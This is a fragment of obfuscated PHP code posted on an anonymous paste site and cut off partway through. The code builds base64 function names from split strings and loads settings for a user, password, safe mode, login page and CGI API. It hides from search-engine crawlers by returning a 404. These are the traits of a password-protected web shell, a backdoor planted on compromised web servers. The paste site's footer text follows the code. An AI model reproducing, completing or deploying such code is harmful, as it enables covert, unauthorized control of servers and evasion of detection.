        $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
        $ac = 0;
        $enc = '';
        $tmp_arr = array();
        if (!$data)
        {
            return $data;
        }
        do
        {
            $o1 = $aztJtafUXm($data, $i++);
            $o2 = $aztJtafUXm($data, $i++);
            $o3 = $aztJtafUXm($data, $i++);
            $bits = $o1 << 16 | $o2 << 8 | $o3;
            $h1 = $bits >> 18 & 0x3f;
            $h2 = $bits >> 12 & 0x3f;
            $h3 = $bits >> 6 & 0x3f;
            $h4 = $bits & 0x3f;
            $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
        }
        while ($i < strlen($data));
        $enc = implode($tmp_arr, '');
        $r = (strlen($data) % 3);
        return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3));
    }
    function charCodeAt($data, $char)
    {
        return ord(substr($data, $char, 1));
    }
    function charAt($data, $char)
    {
        return substr($data, $char, 1);
    }
}
else
{
    function vcnvSCZgBz($s)
    {
        $b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '';
        return $b($s);
    }
}
if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''))
{
    function zRtSHsbTzV($input)
    {
        if (empty($input)) return;
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
        $i = 0;
        $output = "";
        $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
        do
        {
            $enc1 = strpos($keyStr, substr($input, $i++, 1));
            $enc2 = strpos($keyStr, substr($input, $i++, 1));
            $enc3 = strpos($keyStr, substr($input, $i++, 1));
            $enc4 = strpos($keyStr, substr($input, $i++, 1));
            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr((int)$chr1);
            if ($enc3 != 64)
            {
                $output = $output . chr((int)$chr2);
            }
            if ($enc4 != 64)
            {
                $output = $output . chr((int)$chr3);
            }
            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
        }
        while ($i < strlen($input));
        return $output;
    }
}
else
{
    function zRtSHsbTzV($s)
    {
        $b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '';
        return $b($s);
    }
}

function __ZW5jb2Rlcg($s)
{
    return vcnvSCZgBz($s);
}
function __ZGVjb2Rlcg($s)
{
    return zRtSHsbTzV($s);
}

$GLOBALS['DB_NAME'] = $GLOBALS['oZgNypoPRU'];

foreach ($GLOBALS['DB_NAME'] as $key => $value)
{
	$prefix = substr($key, 0, 2);
	if ($prefix == "us")
	{
		$GLOBALS['DB_NAME']["user"] = $value;
		$GLOBALS['DB_NAME']["user_rand"] = $key;
	}
	elseif ($prefix == "pa")
	{
		$GLOBALS['DB_NAME']["pass"] = $value;
		$GLOBALS['DB_NAME']["pass_rand"] = $key;
	}
	elseif ($prefix == "sa")
	{
		$GLOBALS['DB_NAME']["safemode"] = $value;
		$GLOBALS['DB_NAME']["safemode_rand"] = $key;
	}
	elseif ($prefix == "lo")
	{
		$GLOBALS['DB_NAME']["login_page"] = $value;
		$GLOBALS['DB_NAME']["login_page_rand"] = $key;
	}
	elseif ($prefix == "sh")
	{
		$GLOBALS['DB_NAME']["show_icons"] = $value;
		$GLOBALS['DB_NAME']["show_icons_rand"] = $key;
	}
	elseif ($prefix == "po")
	{
		$GLOBALS['DB_NAME']["post_encryption"] = $value;
		$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
	}
	elseif ($prefix == "cg")
	{
		$GLOBALS['DB_NAME']["cgi_api"] = $value;
		$GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
	}
}

unset($GLOBALS['oZgNypoPRU']);

if (!isset($_SERVER["HTTP_HOST"])) exit();

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset(…
Comments
No comments yet
Please complete the captcha
7/12/2024
Not all user generated content is reviewed by AnonPaste. If you believe this paste violates our community guideline or terms of service, please report it here.

Initializing...

Preparing the app. This may take a moment before app is ready.

Change Language
Terms of Service
Privacy Policy
Legal
AnonPaste is a user-generated content hosting service. The platform and its operators are not responsible for content posted by users.